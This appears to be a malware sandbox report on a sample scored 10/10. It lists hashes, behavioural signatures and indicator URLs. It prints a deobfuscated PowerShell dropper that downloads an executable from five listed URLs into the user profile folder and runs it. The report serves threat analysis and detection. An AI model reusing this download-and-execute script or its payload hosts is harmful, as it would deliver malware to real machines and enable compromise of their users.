General

  • Target

    f412a78d93f03f39f6a58c865c75d6481a3ecfb83a3fdbf1ed32c0c546a773f5

  • Size

    143KB

  • Sample

    220625-k1eykagch3

  • MD5

    8ec323edb643a73a6fa43fccacf6deca

  • SHA1

    9cb74cfb6cb5991866159c1ccf5e5606c24ea051

  • SHA256

    f412a78d93f03f39f6a58c865c75d6481a3ecfb83a3fdbf1ed32c0c546a773f5

  • SHA512

    57917137808d4ea22313b72470fbade7d10e4ed5c4588b01384eb5bd964417aee1913a9da745466aba3ae86d6afb8b0b75f9e2c79dede4eda74a930fbbcfc7cc

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
1
$b302523 = "K7145_0_"
2
$t0575862 = "106"
3
$s372880 = "R137437"
4
$t_533031 = $env:userprofile + "\\" + $t0575862 + ".exe"
5
$p27526 = "Y_86957"
6
$z919139 = new-object net.webclient
7
$p067442 = "http://splussystems.com/wp-admin/eUJLagjD/", "http://www.portduo.com/wp-content/KdWRhFjK/", "http://telenvivo.com/hq1g/vp33l1h56_o4b8mev9qw-7034/", "http://luxuryindiancatering.co.uk/wp-includes/ukoe_7v10mk-02/", "http://prizma.ch/wp-content/fFVmwFqTq/"
8
$o88694 = "j246134"
9
foreach ($p791759 in $p067442) {
10
try {
11
$z919139.downloadfile($p791759, $t_533031)
12
$p61_2194 = "S0778_3_"
13
if ((get-item $t_533031).length -ge 38915) {
14
invoke-item $t_533031
15
$b95_6510 = "S9122723"
16
break
17
$j7506168 = "K55_487_"
18
}
19
} catch {
20
}
URLs
exe.dropper

http://splussystems.com/wp-admin/eUJLagjD/

exe.dropper

http://www.portduo.com/wp-content/KdWRhFjK/

exe.dropper

http://telenvivo.com/hq1g/vp33l1h56_o4b8mev9qw-7034/

exe.dropper

http://luxuryindiancatering.co.uk/wp-includes/ukoe_7v10mk-02/

exe.dropper

http://prizma.ch/wp-content/fFVmwFqTq/

Targets

    • Target

      f412a78d93f03f39f6a58c865c75d6481a3ecfb83a3fdbf1ed32c0c546a773f5

    • Size

      143KB

    • MD5

      8ec323edb643a73a6fa43fccacf6deca

    • SHA1

      9cb74cfb6cb5991866159c1ccf5e5606c24ea051

    • SHA256

      f412a78d93f03f39f6a58c865c75d6481a3ecfb83a3fdbf1ed32c0c546a773f5

    • SHA512

      57917137808d4ea22313b72470fbade7d10e4ed5c4588b01384eb5bd964417aee1913a9da745466aba3ae86d6afb8b0b75f9e2c79dede4eda74a930fbbcfc7cc

    Score
    10/10
    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • Blocklisted process makes network request

    • Drops file in System32 directory

MITRE ATT&CK Enterprise v6

Tasks

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.